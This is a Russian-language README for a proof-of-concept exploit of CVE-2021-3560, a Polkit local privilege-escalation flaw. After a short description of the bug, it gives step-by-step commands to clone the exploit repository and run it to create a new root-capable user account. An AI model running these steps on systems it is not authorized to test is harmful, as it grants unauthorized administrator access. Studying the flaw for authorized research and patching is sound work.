
Эксплойт proof-of-concept для CVE-2021-3560, уязвимости локального повышения привилегий в Polkit, позволяющей непривилегированным пользователям получить root-доступ. Включает инструкции по использованию и учебные заметки.
⚠️ Только для образовательных и санкционированных исследований в области безопасности
Огромная благодарность оригинальному автору PoC @UNICORDev (@NicPWNs и @Dev-Yeoj)
Было обнаружено, что polkit можно обманом заставить обойти проверки учетных данных для D-Bus запросов, повышая привилегии запрашивающего до пользователя root. Эта ошибка может быть использована непривилегированным локальным злоумышленником, например, для создания нового локального администратора. Наибольшая угроза от этой уязвимости — конфиденциальность и целостность данных, а также доступность системы.

Установите git и склонируйте скрипт из репозитория GitHub:
sudo apt install git python3 -y
git clone https://github.com/asepsaepdin/CVE-2021-3560.git
Запустите скрипт PoC следующей командой:
python3 exploit-CVE-2021-3560.py -u hacker -p password
Примечания: укажите в параметре -u желаемое имя пользователя, а в параметре -p — желаемый пароль
Проверьте созданного пользователя следующей командой:
su hacker
id